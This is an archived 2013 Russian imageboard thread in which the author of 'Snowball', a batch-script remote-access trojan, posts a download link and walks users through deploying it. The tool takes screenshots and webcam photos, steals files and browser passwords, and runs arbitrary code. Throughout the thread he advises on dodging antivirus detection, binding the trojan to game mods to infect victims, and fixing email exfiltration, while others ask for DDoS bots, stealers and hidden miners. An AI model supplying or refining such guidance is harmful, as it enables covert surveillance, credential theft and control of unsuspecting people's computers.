Сохранен F 255
https://2ch.hk/i/res/42211.html

Snowball

 Аноним Срд 03 Апр 2013 17:11:28  #1 №42211 
1364994688373.jpg

Версия snowball_2.6. Написанная на бат личинка, позволяющая удаленно управлять чужим компьютером. Умеет делать скриншот, фото с вебкамеры, получать список файлов, красть файлы, выполнять произвольный код и еще кучу всяких приятностей. Проста в установке, любовна и прельстива для антивирусов.
В комплекте - несколько вспомогательных программ.
Что нового в этой версии:
snowball_2.6 Новая команда "thumbs".
snowball_2.5 Новая команда "collect".
snowball_2.4 По вашим просьбам: личинка извещает при первой установке
snowball_2.3 Личинка сообщает, если ты управляешь ею в первый раз

Подробнее:
Команда "thumbs"
Создание превью из изображений.
При получении этой команды бот составляет список всех файлов (изображений), подходящих по маске, указанной 9 и далее строками, затем при помощи программы nconvert преобразует в картинки формата jpg с разрешением 160*160 и качеством jpg 50, упаковывает в архив и отправляет. В каждую папку будет вложен файл "path.txt", где будет указан полный путь к папке - для удобства копирования.

Команда "collect"
Сбор файлов по маске.
При получении этой команды бот составляет список всех файлов, подходящих по маске, указанной 9 и далее строками, затем вычисляет их общий размер и отправляет информацию об этом. Если пользователь отправляет подтверждение, указанные файлы сжимаются и отправляются. Если отправить команду "collect" без дополнительных параметров, будет прислана информация о ранее проведенном поиске, либо ответ "no data", если поисков еще не было.

Скачать: http://rghost.ru/45014526
Примечание: я не стал запаковывать хелп в единый файл .chm, пусть будет пачкой .html. Для прочтения следует открыть index.html.

Предыдущий тхреад: >>24748 (много полезного, кто интересуется)

Аноним Срд 03 Апр 2013 18:13:37  #2 №42215 

А поцчему раньше называлось hardamax, и было версии 4? Переписал с нуля что ли?

Аноним Срд 03 Апр 2013 18:25:47  #3 №42216 

>>42215
Я использую следующую систему:
Если добавил новую функцию - плюсую вторую цифирьку, т.е. x.y+1.
Если переписал код (не то чтобы совсем с нуля, но, скажем, заменил повторяющиеся участки функцией) - плюсую первую цифирьку, т.е. x+1.y.
Если добавляю что-то революционно новое, придумываю новое название. В случае со Snowball - это запуск команд в отдельных процессах, что дает колоссальный плюс к надежности.

Аноним Срд 03 Апр 2013 18:36:15  #4 №42219 

>>42216
Молодец, чо.

Аноним Чтв 04 Апр 2013 12:50:49  #5 №42246 

Может зойпилишь гит или svn репозиторий для своей личинки?
Я бы покоммитил

Аноним Чтв 04 Апр 2013 12:59:12  #6 №42247 

И да почему вы так дрочите на батники?
Почему нельзя взять написать на пиздоне сделать из это .exe, а потом в бекграунд отдавать?

Аноним Чтв 04 Апр 2013 13:24:25  #7 №42248 

>>42247
Забей, чувак, это у них хроническое.
перлобог

Аноним Чтв 04 Апр 2013 13:51:02  #8 №42251 

>>42247
У нас тут своя атмосфера жпг. Хули надо? Уроки сделал? exe из пиздона, вообще охуеть.

Аноним Чтв 04 Апр 2013 14:07:09  #9 №42252 

http://www.py2exe.org/ ебать_ты_лох.жпг

Аноним Чтв 04 Апр 2013 14:08:08  #10 №42253 

>>42251
И вот еще как ты думаешь клиент дропбокса, написанный на пиздоне, работает?

Аноним Чтв 04 Апр 2013 14:10:57  #11 №42254 

На самом деле мне горит perdaq от batch и powershell, по сравнению с божественным башем, они просто пиздецки убоги

Аноним Чтв 04 Апр 2013 14:15:45  #12 №42255 

>>42253
Ты, кукаретик, блять собери сначала hello world и попробуй уложиться хотя бы в 2 метра. И чтоб self-contained, не расчитывал на msvcrt. И на вирустотале заодно проверь. Ну а там и приходи со своим кококо.

Зачем вообще вот всё это твоё кококо, шишка что ли дымится оттого, что перед 3.5 анонами выебнулся?

Аноним Чтв 04 Апр 2013 14:23:06  #13 №42256 

>>42254
Язык батников старше тебя в два раза, оттого и убогий. Ну, powershell - просто убогое говно, что поделать. Ну так не пиши на них, чего сразу пердак-то рвёт?

Аноним Чтв 04 Апр 2013 14:25:50  #14 №42257 

>анонами
>выебнулся

ЩИТО?! Сам то понял че спизданул, маня?

Аноним Чтв 04 Апр 2013 14:27:03  #15 №42258 

>>42255
Ну ладно похуй на пиздон, можно и на няшной написать раз тебе так печет, байтоебушка ты мой

Аноним Чтв 04 Апр 2013 14:33:08  #16 №42259 

>>42258
Так напиши, хуле ж. Тред свой запили с сапёром и шлюхами. Кукарекать-то какой смысл?

Аноним Чтв 04 Апр 2013 14:46:12  #17 №42260 

>>42254
Двачую. Я лучше на vbs напишу, чем на бате.
>>42255
>попробуй уложиться хотя бы в 2 метра
>04 Апр 2013
Моим хомякам похуй, они и 10 скачают.

sageАноним Чтв 04 Апр 2013 15:07:59  #18 №42262 

>>42260
Похуй - проходи же. У меня большая часть стада на китайском жопорезе, size matters.

Аноним Птн 05 Апр 2013 01:07:03  #19 №42396 
1365109623365.jpg

>>42215
Пикрелейтед.

Аноним Пнд 08 Апр 2013 17:17:46  #20 №42544 
1365427066600.jpg

Ломающие новости из уютного инвалидного мирка батников: Иногда случается такая проблема, когда переменная равна единице, двойке или около того, а требуется записать ее в файл, типа

set huita=1
echo %huita%>test.txt

и ничего не получается. В таких случаях я раньше писал в конце какой-нибудь символ (еще один знак «=», например, что можно наблюдать в разделе «:settings» личинки) или пробел, но это тоже не идеально.
Придумал такой костыль:
set huita=1
for /f "tokens=*" %%a in ("%huita%") do echo %%a>test2.txt

Если вдруг кому надо. Хотя возможно, есть и проще способ.
И еще хотел спросить, кто-нибудь кроме меня использует скрипт «Sparkle»? Собрался переписать его, а то он снаружи-то работоспособный, а внутри страшненький, ибо писался без плана, по ходу возникновения различных нужд. Что нужно добавить, какие баги/неудобства обнаружены?
Аноним Пнд 08 Апр 2013 17:31:44  #21 №42545 

>>42544
Sparkle юзаю постоянно-очень удобная штука. единственное, что смущает, в некоторых командах дополнительные строки читаются сразу из special.txt, а хотелось бы их просто водить. только что это за команды- не помню

Аноним Пнд 08 Апр 2013 17:48:44  #22 №42546 

>>42545
Вроде бы во всех командах, где требуются дополнительные строки, их можно вводить вручную. Может, старая версия какая-то?

Аноним Пнд 08 Апр 2013 18:02:20  #23 №42547 

>>42546
может. а может меня просто глюкануло и нет такого.
а так, за время пользования не было ни одной ошибки.

sageАноним Пнд 08 Апр 2013 18:03:59  #24 №42548 

>>42544
Способ проще: echo %huita% > test.txt
Лол.

Аноним Пнд 08 Апр 2013 18:06:32  #25 №42549 

>>42548
> или пробел
Пробел - тоже символ, тоже значимый. "1 " neq "1".

sageАноним Пнд 08 Апр 2013 18:14:15  #26 №42550 

>>42549
Ну ладно, echo ^%hunta%>t.txt

Аноним Пнд 08 Апр 2013 18:16:15  #27 №42551 

>>42547
точно, у меня старая версия была. И суть проблемы перепутал- там run можно было только вручную ввести.

sageАноним Пнд 08 Апр 2013 18:16:33  #28 №42552 

>>42550
Хотя для пустой хуиты это не сработает, конечно. Ну да и нечего пробелы значимыми делать, нинужны.

Аноним Пнд 08 Апр 2013 19:35:15  #29 №42557 

>>42550
> ^%hunta%
Хм, действительно, работает. А я-то был уверен, «^» экранирует только один следующий символ, «%». А для пустой-то хуиты ничего не сработает, там надо затычку ставить, «if not "%huita%"==""».
Спасибо, так намного лучше.

Аноним Пнд 08 Апр 2013 19:45:28  #30 №42559 
1365435928943.png

>>42557
А вообще, постой-ка, постой-ка. Просто единицу - да, пишет. А, например, huita=limit=1 - уже нет. Забавно, но видимо вернусь к своему велосипеду.

sageАноним Втр 09 Апр 2013 12:21:37  #31 №42580 

>>42559
Действительно, без велосипеда не выходит. Шайтан-арба это cmd.

Аноним Срд 10 Апр 2013 11:18:40  #32 №42604 
1365578320447.png

Хех, я такой глупый. Оказывается, при работе по ftp для смены папки на какую-нибудь глубоко вложенную не надо указывать по очереди, типа
cd папка
cd подпапка
cd подподпапка
а можно просто приказать "cd папка/подпапка/подподпапка", как в cmd. А я-то специальный костыль изобрел для разбирания пути на элементы.
Однако, в личинке менять не буду, ибо этот костыль там еще одну задачу решает, отделяет путь от файла и "ftp:".
Мой личный бложек

Аноним Срд 10 Апр 2013 11:43:37  #33 №42605 

>>42604
Ты не поверишь, но можно и вообще cd не делать, а работать с полными путями.

Аноним Срд 10 Апр 2013 16:38:23  #34 №42648 

>>42605
Хотел соврать, что и так это знал, но я этого не знал. Теперь попробовал. Это гораздо удобнее, да.
Вот бы ты ошеломил меня еще больше и сказал, что есть способ создавать сразу множество вложенных папок, типа "mkdir dir1/dir2/dir3", я бы совсем стал счастлив. Или чтобы они сами создавались при указании полного пути, которого пока не существует.

Аноним Срд 10 Апр 2013 16:46:21  #35 №42649 

>>42648
Вот нет, mkdir -p в ftp не запилили, к сожалению. Конечно, если у тебя свой сервер с ftp, то есть варианты с site exec, но и тогда лучше не надо. Спиздят из личинки пароль, и гроб гроб кладбище твоему серверу.

Аноним Срд 10 Апр 2013 21:43:49  #36 №42661 
1365615829299.png

Нашел некоторое время назад ftps.exe - программа хороша тем, что почти полностью совместима в плане синтаксиса со стандартным ftp.exe, но умеет в пассивный режим, и теперь в своих скриптиках заменяю используемый ранее ncftpput.exe на него.
И вот понадобилось мне сделать заливку на ftp целой папки с подпапками. И я знаю, как это сделать средствами bat, т.е. разобрать путь на составляющие, создать папки и все файлы куда надо раскидать. Но я чертовски боюсь, что в ftps.exe окажется такая готовая функция. В ncftpput.exe, например, есть. И если вдруг я напишу свой велосипед, а потом узнаю, что такая функция там уже готовая есть, свечение моего БАГРЕПОРТА затмит солнце, потому что опять почувствую себя обезьяной, невнимательно читающей справку.
Может, кто-нибудь чисто случайно (бывают же совпадения) уже использовал ftps.exe и знает точно о наличии/отсутствии этой функции? В справке не нашел, в гугле тоже - утилита не особо популярная.
Делаю новую версию скрипта Sparkle, хочу, чтоб сам заливал все необходимые файлы на сайт, чтоб, значит, зарегистрировал - ввел в настройки - и оно всё само оформилось.

Аноним Срд 10 Апр 2013 21:55:30  #37 №42665 

>>42661
Ну, знаешь, если ты уже штатный ftp заменил, то ААААА НАСТАЛО ВРЕМЯ УСТАНОВИТЬ curl

Аноним Срд 10 Апр 2013 21:57:06  #38 №42667 

>>42665
Это я про его ключ --ftp-create-dirs

Аноним Чтв 11 Апр 2013 06:00:33  #39 №42681 

>>42665
> УСТАНОВИТЬ curl
Зачем мне нужен curl, у меня нет времени, чтобы возиться с ним. Как и с прочими скриптами, для которых надо что-то устанавливать. Понимаю, они штука мощная, но я хочу, чтоб все было портативно и запускалось даже на чистой свежеустановленной винде без фреймворков и библиотек.

Аноним Чтв 11 Апр 2013 11:55:36  #40 №42700 

>>42681
Подожди, но ведь он не скрипт, а self-contained программа типа wget. Кстати, можно и wget им заменить.

Аноним Чтв 11 Апр 2013 17:02:56  #41 №42714 

>>42700
> self-contained программа типа wget
ААААА, черт, вспомнил же. Что-то в голове у меня это название перепуталось со всякими там перлами и питонами. Да, стоит попробовать.

Аноним Чтв 11 Апр 2013 19:50:05  #42 №42724 

Ответьте на один вопрос. Почему поделка ОПа до сих пор не отправлена на вирустотал или лично дяде жене?

sageАноним Чтв 11 Апр 2013 20:39:31  #43 №42725 

>>42724
Всем похуй же, что ты как маленький.

Аноним Чтв 11 Апр 2013 22:06:28  #44 №42729 
1365703588484.png

>>42724
> до сих пор не отправлена на вирустотал
Лололо, я ж каждую новую версию туда отправляю вот уже... не помню сколько, с первых версий. Ты думаешь, есть кому-то дело до моего паруса одинокого на фоне стальных кораблей? Прям отправил батник, и тут же где-то взвыла сирена и загорелась вращающаяся красная лампа, и суровые бойцы невидимого антивирусного фронта вскакивают с постелей, съезжают по стальной штанге и прыгают за компьютеры, чтобы лично проанализировать его и вручную добавить в базы антивирусов.
https://www.virustotal.com/ru/file/5be24e73d95dc7b5fbb05fd38eef2759af35891b6694d4ec75d730a013295ff5/analysis/1364996207/
Кажется, вот последний результат, в хистори нашел.

Аноним Птн 12 Апр 2013 03:14:05  #45 №42754 

>>42729
Ньюфага вопрос - а на что из пака, кроме самого батника, могут агриться антивири?

Аноним Птн 12 Апр 2013 16:06:53  #46 №42760 

>>42754
ftprar.mp3
httprar.mp3
proxyrar.mp3
winvnc.mp3
Первые три - потому что там используется черезжопный метод сокрытия через запуск от system; последний - потому что remote control tool. Остальное вроде в белом списке.

Аноним Птн 12 Апр 2013 16:26:54  #47 №42762 

>>42729
Ёба если хочешь могу сканить билды на платном сканере который не палит личинок.

Аноним Птн 12 Апр 2013 16:59:10  #48 №42764 

>>42762
Не вижу необходимости, он и так не палит, но спасибо за предложение.

Аноним Птн 12 Апр 2013 19:49:32  #49 №42766 

Я не понял - ОП слепил троянца из батников?

Аноним Птн 12 Апр 2013 20:28:15  #50 №42768 

>>42766
Как будто что-то плохое.

Аноним Птн 12 Апр 2013 20:49:52  #51 №42772 
1365785392276.png

>>42766
Совершенно верно. И заметь, задолго до маэстро Бабушкина.
Делаю принципиально новую версию Sparkle, в принципе функционал близок уже к старой версии, осталось украсить да новые плюшки навешать, но дело-то вот в чем: новых плюшек мало, а все изменения чисто внутренние - код стал более структурированным и логичным. Снаружи-то особых изменений не заметно. Что бы такого выпендрежного туда запилить, чтоб сразу было видно: да, новая версия?

Аноним Птн 12 Апр 2013 21:13:55  #52 №42774 

>>42772
Бро, а почему ты не хочешь изучить winapi, да работать с ним напрямую? Это ведь не так сложно, в отличае от батников. Да и полезные знания же.

Аноним Птн 12 Апр 2013 21:48:22  #53 №42775 

>>42774
Я так и так на жизнь не программированием зарабатываю, так что батники скорее ради удовольствия. Впрочем, простые повседневные задачи на них решать тоже можно, так что и польза есть.
Если мыслить глобально, есть огромное множество хороших программистов на многих полноценных языках. Зачем нужен еще один начинающий, не факт что чего-то способный добиться? А вот скриптописец на батниках раз в сто лет но может пригодиться внезапно.
Впрочем, я может и наберусь однажды смелости, попробую на чистом Си или на делфи.

Аноним Птн 12 Апр 2013 21:59:10  #54 №42776 

>>42775
>А вот скриптописец на батниках раз в сто лет но может пригодиться внезапно.
Оче сомневаюсь. Хотя даже VB-макаки пишут РПГ в Экселе: http://gizmodo.com/5992533/awesome-accountant-made-an-rpg-inside-microsoft-excel

Аноним Птн 12 Апр 2013 22:14:00  #55 №42777 

>>42776
Чего сомневаться, если ИТТ наглядный пример? С бинарником на вирустотале сам знаешь, что происходит, хоть ты его пятью разными крипторами закриптуй. А вот разобрать полиморфный бат, который генерит полиморфный бат - нету таких аналитиков у дяди жени за разумные деньги. Вот и не детектится.

Аноним Птн 12 Апр 2013 22:41:12  #56 №42778 
1365792072131.png

>>42777
> полиморфный бат, который генерит полиморфный бат
О, ты мне льстишь. Он всего лишь разбавляется рандомными комментариями, сам смыслонесущий код остается неизменным. Теоретически можно его по-настоящему обфусцировать, скажем добавить кучу ничего не делающих участков и разбить модули на осколки с безусловными переходами между ними, но я вряд ли смогу это делать автоматически.
Время от времени какой-нибудь антивирус (обычно аваст) начинает детектить батник как вирус. Тогда я ищу тот участок, который его возбуждает, переставляю местами строчки/подменяю переменными строчки и он перестает детектиться еще на несколько месяцев. Если интересно, можешь посмотреть в батнике, найдешь нужные места по слову «Аваст» и «др.Веб».

Аноним Суб 13 Апр 2013 01:01:38  #57 №42781 

>>42778
Что такое Sparkle и для чего нужно?

Аноним Суб 13 Апр 2013 09:40:32  #58 №42785 

>>42781
!!snowball\программы с вирусами\!!! sparkle\
Это скрипт для автоматизированного формирования cheese.txt и отправки его на командные сайты.

Аноним Суб 13 Апр 2013 22:48:39  #59 №42813 

>>42211
Продолжая рубрику ньюфажных вопросов,оп какие могут быть причины того что батник видит файл chesse.txt но при этом не качает файлы и не выполняет команды

Аноним Вск 14 Апр 2013 00:43:43  #60 №42815 

>>42813
>батник видит файл chesse.txt
Как узнал, что он его видит? Какие именно команды подавал? Приведи пример заполненного cheese.txt
Вообще, как я заметил, самая распространенная проблема - неправильное заполнение cheese.txt.

sageАноним Вск 14 Апр 2013 09:20:57  #61 №42817 

>>42777
>С бинарником на вирустотале сам знаешь, что происходит, хоть ты его пятью разными крипторами закриптуй.
Знаю, 0/46 там происходит при использовании нормального крипта.

Аноним Вск 14 Апр 2013 11:32:53  #62 №42820 

>>42817
А ты через недельку вернись с тем же бинарником.

sageАноним Вск 14 Апр 2013 12:09:06  #63 №42821 

>>42820
Рекрипт. И да, на ВТ обычно не чекают то, что легко снимается.

sageАноним Вск 14 Апр 2013 12:10:13  #64 №42822 

>>42821
И от крипта зависит срок тоже, да.

Аноним Вск 14 Апр 2013 12:14:14  #65 №42823 

>>42777
>С бинарником
>пятью разными крипторами
>разобрать полиморфный бат, который генерит полиморфный бат - нету таких аналитиков у дяди жени
Самому-то не смешно?

Аноним Вск 14 Апр 2013 12:23:55  #66 №42824 

>>42823
У нас тут анонимная имиджборда для гуманитариев. Японских нарисованых девочек постить, понимаешь? Чего тебе тут надо, хакир?

Аноним Вск 14 Апр 2013 12:27:10  #67 №42825 

>>42824
Пойду пожалуй к дяде Жене, раз у него так плохо с аналитиками, что
>всего лишь разбавляется рандомными комментариями, сам смыслонесущий код остается неизменным
- это уже неебаться полиморфность, которую не могут вскрыть даже самые высококлассные дипломированные аналитики.

Аноним Вск 14 Апр 2013 12:39:57  #68 №42826 

>>42825
С таким чувством юмора будет тяжеловато. Да и платят не оче.

Аноним Вск 14 Апр 2013 17:49:06  #69 №42835 

>>42825
КОНОЁБ ОПЯТЬ ТЫ СУКА, А НУ ПРИЗНАВАЙСЯ.

Аноним Пнд 15 Апр 2013 05:27:43  #70 №42840 

>>42211
Тред не читал, пароли от тентаклика мне принесёт?

Аноним Пнд 15 Апр 2013 05:55:08  #71 №42841 

>>42840
!!snowball\! шаблоны obey\01. пароли браузеров\
Да.

Аноним Пнд 15 Апр 2013 07:06:09  #72 №42842 
1365995169877.jpg

>>42841
Всегда знал что поняши рулят.
Хотя, минус в твоей ситуации, что на кексы тебе кинуть что-нить не получится, в отличие, например, от Шинкуфага.

Аноним Пнд 15 Апр 2013 16:44:51  #73 №42872 
1366029891299.jpg

>>42842
> на кексы тебе кинуть что-нить не получится
Не нужно, я питаюсь вашей любовью :3
Сделал новую функцию - "tore", суть токова:
Иногда у пользователя много больших видеороликов в папке, по названиям/превьюшкам не понять, о чем они. Или есть куча больших архивов, и нужно посмотреть список файлов, что в них. Эта функция позволит от каждого файла откусить кусочек и получить кучу их. Типа как "cut", только не для одного файла, а для целой папки. Сейчас обкатываю, но вроде работает.
Только фиг знает, нужно ли. У меня в личинке и так изрядно команд, которые нужны бывают раз в сто лет.
С другой стороны, пусть лучше будет, но не понадобится, чем понадобится, но не будет. Пара килобайт погоды не делает.

Аноним Пнд 15 Апр 2013 17:20:31  #74 №42877 

>>42872
Пилите, Шура, пилите.
Чому бы и нет, лишь бы в радость.
И, на правах школьника-гуманитария, вопрос:
Какие это вы книжки читали, что создали тут, как я вижу, просто боевое крыло двача? Я не хотел никого обидеть

Аноним Втр 16 Апр 2013 00:00:06  #75 №42882 

>>42877
>книжки
>bat
Лол.

Аноним Втр 16 Апр 2013 02:02:43  #76 №42884 
1366063363315.jpg

>>42882

Аноним Втр 16 Апр 2013 10:19:36  #77 №42886 

Прошу прощения за свой идиотизм, но у меня нихуя не работает. Может кто подскажет, что я делаю не так?
Создаю почту на mail.ru, сайт на wen.ru
Открываю xvid.bat в akelpad и привожу строки к виду:

set site=логин.wen.ru
set site0=логин.wen.ru
set site1=логин.wen.ru

set itsme=anon
set group=test

заливаю на сайт содержимое папки сайт.
запускаю xvid.bat
в фаил cheese.txt на сайте вписываю:

sugarcube,012
smtp
smtp.mail.ru
логин@mail.ru
пароль
test
anon
screenshot

На почту нихуя не приходит.
В чем может быть дело?

Аноним Втр 16 Апр 2013 11:23:54  #78 №42887 
1366097034044.png

>>42886
Навскидку, вроде все правильно. Попробуй с "everypony/everypony", что ли. Попробуй еще это >>39119
>>42877
> Какие это вы книжки читали
Гугл читал в основном, возникала задача - искал решение. Ну, SL-кун еще кой-чего советовал.

Аноним Втр 16 Апр 2013 11:55:07  #79 №42888 

>>42887
Спасибо, бро, разобрался. Процессхакер помог. Я как последний долбоеб не стал заливать Alert.txt а отключить уведомление забыл.

Аноним Втр 16 Апр 2013 11:55:12  #80 №42889 

>>42887
>SL-кун еще кой-чего советовал
Кто таков, чем знаменит, что советовал?

Аноним Втр 16 Апр 2013 14:13:19  #81 №42892 

>>42889
СЛ кун запилил странжлов, батник работающий из под радмина который творил очень много годноты.
Кстати ёба, ты с ним еще слышишься? Он еще жив? В конце концов он запилил странжлов 2.0?

Аноним Втр 16 Апр 2013 15:37:08  #82 №42894 

Няша, подскажи, как склеить все в проге c эксешником?
Алсо + в карму.

Аноним Втр 16 Апр 2013 15:51:00  #83 №42895 
1366113060894.png

>>42889
Ньюфаг, хули ты тут забыл? Иди читай архивы сл-тредов. Наприходят тут из хуйвтактика, потом еще и сами ничего изучать не хотят - обо всем спрашивают. Нахлебники.

Аноним Втр 16 Апр 2013 15:59:19  #84 №42896 

>>42892
Он же ушёл раковать на форум к извращенцам, а потом вообще съебал в никуда.

Аноним Втр 16 Апр 2013 17:02:29  #85 №42898 

>>42895
А, лол, понял, это некий тут, кто есеты всяческие за защиту считает, да ещё и рекомендует. Ну извините, не имею привычки запоминать каждого поперечного неймфага. А ты подсиралой будешь или он и есть, только трип снял? :3

Аноним Втр 16 Апр 2013 17:04:59  #86 №42899 
1366117499400.png

>>42888
> не стал заливать Alert.txt а отключить уведомление забыл
Хм... Ответ на команды из командного файла все равно должен был прийти, alert в отдельном процессе обрабатывается. Я попробую у себя повторить эту ситуацию.
>>42892
Нет, не общаюсь, ничего о нем не слышал с того времени, как он отсюда ушел.
> как склеить все в проге c эксешником
!!snowball\пример инсталлятора\ например, ты об этом? Или что с чем склеить, я не понял.

Аноним Втр 16 Апр 2013 17:06:27  #87 №42900 

>>42898
>А, лол, понял это ваше местное сокращение литхекк с ПРЕВАТАМИ на БАТАХ

быстродобавил

Аноним Втр 16 Апр 2013 17:26:39  #88 №42901 

>>42899
Хитрыйплан мод on
Беру мод для СКУРИМА, склеиваю его с личинкой, выкладываю на плейграунде.
?????
PROFIT

Аноним Втр 16 Апр 2013 17:37:51  #89 №42902 

>>42901
Если мод единым исполняемым файлом, то получится. Если нет, то нет.

Аноним Втр 16 Апр 2013 17:44:25  #90 №42903 

Спасибо.

Аноним Втр 16 Апр 2013 20:30:43  #91 №42906 

>>42887
Бро, сделал все как в >>39119
Запущен только пинг с параметром -300 и все. Только, блядь, пингует локалхост. На команды не реагирует. Оповещение о первом запуске тоже не приходит. Что делать в данном случае? Сайт на wen.ru

Аноним Втр 16 Апр 2013 21:02:54  #92 №42908 

>>42906
Хотя вроде ожил, скачал wget, судя по всему пытается отправить алерт и инфу по запросу hey но ничего не приходит.

Аноним Втр 16 Апр 2013 21:03:03  #93 №42909 
1366131783025.jpg

>>42906
> пингует локалхост
Все ок, это такой суррогатный таймер.
Попробуй принудительно завершить этот svchost.exe (ping.exe) и понаблюдай в процесс хацкере, что произойдет и на каком этапе облом.
Должны запуститься следующие процессы:
1. Еще раз запустится svchost.exe, но пинговать будет не локалхост, а твой сайт, -n 5
2. Запустится spoolsv.exe (wget.exe) и попытается скачать cheese.txt (ты увидишь это в процесс хакере, в параметрах процесса)
3. spoolsv.exe попытается скачать ctrl.txt
4. Если cheese.txt прочтен и выполняется, spoolsv.exe попытается скачать postie.mp3. Хотя возможно, он уже скачан и лежит в %temp%\postie.exe
5. Если успешно, запускается postie.exe и пытается отправить письмо.
Ты на виртуалке запускаешь? Там может быть такой нюанс, через nat (хотя хз в чем причина) не работает виндовый ftp и не скачивает wget. Проверь, лежит ли в папке со скриптом (%appdata%\web) файл spoolsv.exe, и если нет, значит он еще не скачался. Нужно просто подольше подождать, он в первую очередь пытается скачать со сторонних ftp и лишь потом с сайтов. Ну или если невмоготу ждать, несколько раз заверши svchost.exe, когда он в фазе "-n 300"
Уфф, запутанно вышло, боюсь перечитывать что написал

Аноним Втр 16 Апр 2013 21:08:12  #94 №42910 

>>42908
> пытается отправить
postie.exe в процессах, но письма нет? Попробуй следующее:
1. Положи postie.exe в какую-нибудь папку
2. Туда же положи файл test.bat следующего содержания:

cd /d %~dp0
postie.exe -esmtp -user:тот_юзер@mail.ru -pass:пароль -host:smtp.mail.ru -to:тот_юзер@mail.ru -from:тот_юзер@mail.ru -s:test -msg:"test"
pause

Выполни и посмотри, отправится ли, и если не отправится, в чем проблема.
Аноним Втр 16 Апр 2013 21:20:32  #95 №42911 
1366132832443.jpg

>>42910
Спасибо. Не подскажешь, что это значит?

Аноним Втр 16 Апр 2013 21:25:48  #96 №42912 

>>42909
И да, на виртуалке. spoolsv.exe скачан.

Аноним Втр 16 Апр 2013 21:43:08  #97 №42913 

>>42911
В гугл с кодом ошибки.

>>42909
>> пингует локалхост
>Все ок, это такой суррогатный таймер.
Ох лол, ну просто лучшие традиции, господи, лучшие традиции.

Аноним Втр 16 Апр 2013 21:49:16  #98 №42914 

>>42913
Да в целом понятно, что не получается подключиться к smtp серверу, не понятно почему.

Аноним Втр 16 Апр 2013 21:53:29  #99 №42915 
1366134809782.png

>>42913
> лучшие традиции
Отож :3
>>42911
Раз postie скачался, значит интернет как бы есть, однако в то же время для postie его как бы нет. Брандмауэр? Попробуй со своего компа также отправить.
Гугли.
http://www.google.ru/search?q=%D0%BE%D1%88%D0%B8%D0%B1%D0%BA%D0%B0+10060

Аноним Втр 16 Апр 2013 21:56:36  #100 №42916 

>>42915
Это получается несколько ебанутая ситуация, если стандартный в XP брендмауер не позволяет работать этой личинке.

Аноним Втр 16 Апр 2013 22:07:25  #101 №42917 

>>42916
Думаю, это не он, у меня на виртуалке отправляет со включенным.

Аноним Втр 16 Апр 2013 22:11:18  #102 №42918 

>>42916
>Это получается несколько ебанутая ситуация, если стандартный в XP брендмауер не позволяет работать этой личинке.
Чому это? Вполне нормальная. Нет, не хотим годноту пилить хотя бы по паблик сорцам с минимальными обходами, хотим непонятно что на батниках делать.

Аноним Втр 16 Апр 2013 22:15:54  #103 №42919 

>>42917
Я главное утром сегодня ебался с этим всем и в конце концов заставил это все работать. Помогло(как мне тогда казалось) закидывание на сайт alert.txt. Потом в состоянии аффекта удалил все к хуям с сайта вместе с виртуалкой, дабы повторить нормально уже вечером. И нихуя не работает лол. У меня мозговой штурм сейчас, пытаюсь вспомнить что же я сделал. Вообще часто эта личинка не работает?

Аноним Втр 16 Апр 2013 22:17:45  #104 №42920 

>>42919
Ну и еще у меня подозрение, что на сайте у меня что-то не так. Та как утром письма пошли после упорного изучения и изменения содержимого сайта.

Аноним Втр 16 Апр 2013 22:24:15  #105 №42921 

>>42919
> часто эта личинка не работает
Начиная с версии Snowball - практически без отказов. Раньше да, бывало, сейчас по крайней мере не вылетает и не зависает, ибо в отдельных процессах, да и там в случае ошибки отправки почты еще две попытки предпринимается. На моих компьютерах работает без ошибок.
Ты менял что-то в содержимом сайта, кроме cheese.txt? Попробуй перезалить его, сайт, полностью. Но все же у тебя проблема с postie, Как можно видеть, так что не поможет.

Аноним Втр 16 Апр 2013 22:25:58  #106 №42922 

>>42921
ну у меня на виртуалке видимо да, проблема с postie. Но я же не только у себя запускал лол.

Аноним Втр 16 Апр 2013 23:36:25  #107 №42923 

>>42921
Короче из четырех хомяков заработало только на одном. Почему так может быть, не подскажешь?

Strangelove-кун !G94AOnl5b2 Срд 17 Апр 2013 02:05:05  #108 №42925 

>>42896
DA TY OHUEL!

Strangelove-кун !G94AOnl5b2 Срд 17 Апр 2013 02:12:01  #109 №42926 

>>42923
Если работает на одном, то работает на другом, а если нет, то это уже следствие специфики хомяков

Аноним Срд 17 Апр 2013 02:42:12  #110 №42927 

>>42926
Нет в мире совершенства. Спасибо, бро. ГДЕ STRANGELOVE 2.0, СУКА?!

Аноним Срд 17 Апр 2013 09:46:48  #111 №42928 

Короче не знаю почему, но postie не работает почти всегда и почти на всех хомяках, хотя сама личинка функционирует. На фтп приходят файлы весом 0 Кб. Что с этим делать, не подскажете? ftp у себя поднял.

Аноним Срд 17 Апр 2013 14:22:27  #112 №42929 

котаны поясните за впаривание софта хомячкам, склейкой? что вообще происходит, у меня рвется шаблон от такого колличества файлов в паке

Аноним Срд 17 Апр 2013 14:27:45  #113 №42930 

Сап посани, необходим бот на батнике.
Функции - основные для ддоса, стиллер, возможность прикрутить непалевный майнер например, это можно найти в этом йоба пакете?

Аноним Срд 17 Апр 2013 15:02:09  #114 №42931 

вт
20/39
пинч с паблик криптом меньше палится

Аноним Срд 17 Апр 2013 15:03:31  #115 №42932 

>>42930
сам сделай, легко же

Аноним Срд 17 Апр 2013 16:21:06  #116 №42934 

Посоны, есть два компа на одном из которых эта личинка, и роутер Tp-link с паролем admin admin лол. Вопрос нубский, но как получить прямой доступ? VMC установил(вроде), но подключиться хз как, какой порт не знаю. Гуглил, пробрасывал, не подключается.
С помощью этой личинки можно радмин прикрутить? С ним как то привычнее.

Аноним Срд 17 Апр 2013 16:39:12  #117 №42936 

>>42934
VNC
Медленный самопочин.

Аноним Срд 17 Апр 2013 16:43:40  #118 №42937 
1366202620093.png

>>42931
https://www.virustotal.com/ru/file/ddf0999f17becf885817d98a9b49b80ac2634f5b5f88814f2d61f7605295cf96/analysis/1366202041/
Ноуп.
> роутер Tp-link с паролем admin admin
Он, по-моему, тебя снаружи не пустит ни на какой порт. У тебя два варианта:
1. Установить ему прокси, подключиться, зайти на http://его_ip. См. команду "makeproxy"
2. Установить ему программу удаленного контроля. Например, командой "makevnc". Но у него же роутер, там надо всё это дело настраивать.
>>42929
> впаривание софта хомячкам, склейкой
goto >>42899
>>42930
> Функции
Стилер паролей там есть (шаблоны obey), остальное сооруди вручную и запусти какой-нибудь из команд, типа "run".

Мальчишки, есть у кого-то желание потестить Sparkle 2.0?
http://rghost.ru/45352966
Пик релейтед.
Настройки совместимы со старой версией, так что можно заново не вводить, просто заменить settings.txt.

Аноним Срд 17 Апр 2013 16:58:27  #119 №42940 
1366203507395.png

